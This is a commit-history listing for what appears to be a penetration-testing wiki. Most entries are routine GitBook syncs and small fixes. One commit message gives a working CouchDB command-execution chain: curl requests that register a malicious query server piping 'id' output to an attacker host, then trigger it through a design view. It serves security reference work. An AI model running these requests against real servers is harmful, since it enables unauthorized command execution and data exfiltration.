Commit Graph

1257 Commits

Author SHA1 Message Date
CPol
6180340b7f
GitBook: [master] 476 pages modified 2021-05-28 17:53:46 +00:00
CPol
bcbe8bc194
GitBook: [master] 7 pages modified 2021-05-28 17:51:59 +00:00
CPol
f664c54527
GitBook: [master] 12 pages modified 2021-05-28 17:40:28 +00:00
CPol
eeca44b246
GitBook: [master] 2 pages modified 2021-05-28 17:29:30 +00:00
CPol
8c458fbbd7
GitBook: [master] 46 pages modified 2021-05-28 17:27:17 +00:00
CPol
4d089a6b37
GitBook: [master] 11 pages modified 2021-05-28 17:24:45 +00:00
CPol
2636a86ca3
GitBook: [master] 23 pages modified 2021-05-28 17:17:38 +00:00
CPol
55540cf1e9
GitBook: [master] 2 pages modified 2021-05-28 17:15:18 +00:00
CPol
20d6d2dcf0
GitBook: [master] 5 pages modified 2021-05-28 17:11:03 +00:00
CPol
4fa8e4d66f
GitBook: [master] 7 pages and 6 assets modified 2021-05-28 17:07:52 +00:00
CPol
e3d70ee2c9
GitBook: [master] 4 pages modified 2021-05-28 15:56:04 +00:00
CPol
187ef3bb0b
GitBook: [master] one page and 4 assets modified 2021-05-28 15:34:20 +00:00
CPol
508c1dc9fa
GitBook: [master] 3 pages and 6 assets modified 2021-05-28 14:09:30 +00:00
CPol
d51b492c53
GitBook: [master] one page and 11 assets modified 2021-05-28 00:43:14 +00:00
CPol
2bfac77aa5
GitBook: [master] 2 pages and 9 assets modified 2021-05-27 20:10:37 +00:00
CPol
fb5375d3ad
GitBook: [master] 2 pages and 7 assets modified 2021-05-27 19:56:06 +00:00
CPol
0ba05c758b
GitBook: [master] one page modified 2021-05-27 18:08:10 +00:00
CPol
8d0614cee9
GitBook: [master] one page modified 2021-05-27 13:03:06 +00:00
CPol
87e89bb1a2
GitBook: [master] 474 pages modified 2021-05-27 13:02:25 +00:00
CPol
e765a981c7
GitBook: [master] 472 pages modified 2021-05-27 11:59:23 +00:00
CPol
5f83c0bdad
GitBook: [master] 3 pages and 3 assets modified 2021-05-27 11:24:11 +00:00
CPol
6d5010301b
GitBook: [master] one page and one asset modified 2021-05-27 11:01:09 +00:00
CPol
9e80c3be33
GitBook: [master] 472 pages modified 2021-05-27 10:20:50 +00:00
CPol
003cba43da
GitBook: [master] 4 pages and 4 assets modified 2021-05-26 23:49:36 +00:00
CPol
7d9a8ddc9a
GitBook: [master] one page and 3 assets modified 2021-05-26 22:50:34 +00:00
CPol
cb8be9a38c
GitBook: [master] one page modified 2021-05-26 11:19:55 +00:00
CPol
d77b102952
GitBook: [master] one page modified 2021-05-26 11:18:48 +00:00
CPol
e7afb9504e
GitBook: [master] one page modified 2021-05-26 09:08:21 +00:00
CPol
487861e0f3
GitBook: [master] 473 pages modified 2021-05-25 23:11:03 +00:00
CPol
fd5d0989f3
GitBook: [master] 7 pages and 8 assets modified 2021-05-25 23:07:25 +00:00
Carlos Polop
6cd7d66ee5
Merge pull request #116 from jeffbencteux/patch-1
Command execution via query_servers fix
2021-05-26 00:06:07 +01:00
Carlos Polop
a2d1f6c4da
Merge pull request #115 from Vincevrp/patch-2
Add missing hyphen
2021-05-25 23:52:47 +01:00
Carlos Polop
c8b8631ec8
Merge pull request #114 from Vincevrp/patch-1
Link to English kubectl install documentation
2021-05-25 23:52:23 +01:00
CPol
353938b47c
GitBook: [master] 5 pages and 10 assets modified 2021-05-25 22:52:07 +00:00
Carlos Polop
b4af99059c
Merge pull request #113 from shivankar-madaan/patch-1
remove duplicate line
2021-05-25 23:51:51 +01:00
Carlos Polop
97c49bdb7a
Merge pull request #112 from clem9669/patch-5
Update Pentesting SNMP
2021-05-25 23:51:28 +01:00
Carlos Polop
097da68802
Merge pull request #111 from AssassinUKG/patch-2
Created 1080
2021-05-25 23:46:44 +01:00
CPol
f60b8d7ea8
GitBook: [master] one page modified 2021-05-24 15:55:07 +00:00
Jeffrey Bencteux
e505cc2b55
Command execution via query_servers fix
Hey man, I got a working example, I think the issue is that you are requesting your view with POST rather than PUT method. Following works for me:

curl -X PUT 'http://<target_ip>:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"id | curl http://<attacker_ip>:<port> -d @-"'
curl -X PUT 'http://<target_ip>:5984/testbed'
curl -X PUT 'http://<target_ip>:5984/testbed/whatever' -d '{"_id":"770855a97726d5666d70a22173005c77"}'
curl -X PUT http://<target_ip>:5984/testbed/_design/whatever -d '{"_id":"_design/test","views":{"anything":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
2021-05-24 10:43:15 +02:00
Vince
92096e6cd1 Add missing hyphen
The "enumeration from a pod" command example to get all services is missing a hyphen.
2021-05-23 23:24:28 +02:00
Vince
44e0145e11
Link to English kubectl install documentation
The Kubernetes "enumeration from a pod" documentation links to Spanish instructions to install kubectl. This commit changes the URL to the English documentation.
2021-05-23 21:11:01 +00:00
CPol
3876d7fb90
GitBook: [master] one page modified 2021-05-21 17:16:33 +00:00
CPol
757acc677c
GitBook: [master] 36 pages modified 2021-05-21 17:13:19 +00:00
CPol
2f22c14f27
GitBook: [master] 3 pages modified 2021-05-21 17:12:21 +00:00
CPol
6c9a0f3975
GitBook: [master] 7 pages modified 2021-05-21 16:38:18 +00:00
CPol
23948173f0
GitBook: [master] 3 pages modified 2021-05-21 11:41:36 +00:00
CPol
fc77b585a9
GitBook: [master] one page modified 2021-05-20 22:43:37 +00:00
CPol
319542ab0f
GitBook: [master] 3 pages modified 2021-05-20 15:02:14 +00:00
CPol
e15860f1d3
GitBook: [master] 467 pages and 2 assets modified 2021-05-20 12:17:20 +00:00
shivankar-madaan
60360dd0c7
remove duplicate line
just shhgit was mentioned twice
2021-05-20 10:38:12 +02:00